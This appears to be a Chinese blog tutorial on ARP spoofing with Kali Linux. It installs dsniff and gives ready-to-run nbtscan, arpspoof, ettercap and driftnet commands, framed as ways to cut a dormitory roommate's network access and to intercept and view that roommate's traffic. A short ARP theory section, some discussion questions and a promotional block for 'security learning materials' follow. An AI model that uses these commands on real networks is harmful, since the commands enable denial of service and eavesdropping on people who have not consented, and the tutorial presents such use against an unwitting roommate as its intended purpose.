x00、軟體安裝及環境搭建
第一步、Kali下載匯入
Kali下載地址(VMware版本):
https://images。kali。org/virtual-images/kali-linux-2020。4-vmware-amd64。7z
解壓後,開啟VMware,
【——全網最全的網路安全學習資料包分享給愛學習的你,關注我,私信回覆“領取”獲取——】
1.網路安全多個方向學習路線
2.全網最全的CTF入門學習資料
3.一線大佬實戰經驗分享筆記
4.網安大廠面試題合集
5.紅藍對抗實戰技術秘籍
6.網路安全基礎入門、Linux、web安全、滲透測試方面影片
第二步、Dsniff套件安裝
Dsniff是一個基於unix系統網路嗅探工具。
Dsniff是一個工具集,主要分為四類:
純粹被動地進行網路活動監視的工具,包括:dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy;
針對SSH和SSL的MITM(Man-In-The-Middle)“攻擊”工具,包括sshmitm和webmitm;
發起主動欺騙的工具,包括:arpspoof、dnsspoof、macof;
其它工具,包括tcpkill、tcpnice。
kali@kali:~#sudo apt-get update #更新軟體列表
kali@kali:~# sudo apt-get install dsniff #從軟體列表中下載安裝dsniff
測試是否安裝成功
我們發現其實執行這個軟體和許可權是息息相關的,我們切換root執行
涉及到的軟體都能夠正常執行(本文僅僅涉及到arpspoof)
0x01、場景一(讓宿舍室友斷網)
第一步、找到室友的ip
NBTSCAN可以獲取到PC的真實IP地址和MAC地址。
nbtscan -r 192。168。10。17/24
第二步、讓他斷網
arpspoof -i 網絡卡 -t 目標IP 閘道器
arpspoof -i eth0 -t 192。168。8。213 192。168。8。1
#0x02、場景二(監控室友網路)
第一步、開啟ip轉發功能(讓他上網)
為使受害者主機的資料包能夠順利收發,我們需在Kali Linux中開啟IP轉發功能
A、開啟:echo 1 > /proc/sys/net/ipv4/ip_forward;
第二步、開啟流量嗅探工具
driftnet 用於抓取網路流量中的圖片,並將他們顯示出來。ettercap是一個基於ARP地址欺騙方式的網路嗅探工具,主要適用於交換區域網絡。
apt-get install driftnet //安裝driftnet工具
ettercap -Tq -i eth0 //-T是僅使用文字GUI,-q不顯示資料內容,-i是指定網絡卡
driftnet -i eth0 //選擇監聽埠為eth0
wireshark
0x03、場景三(實戰案例介紹)
0x04、原理分析
第一步、ARP請求
第二步、ARP響應
前提知識:
ARP是幹啥的?
Arp是地址解析協議,透過ip獲取mac地址的協議(同網段才能獲取)
2。為啥要獲取mac地址?
表面上我們看到的是透過ip進行通訊,實際上區域網都是透過mac地址進行通訊,
0x05、思考題
ARP攻擊應用場景?
ARP攻擊應該如何防護?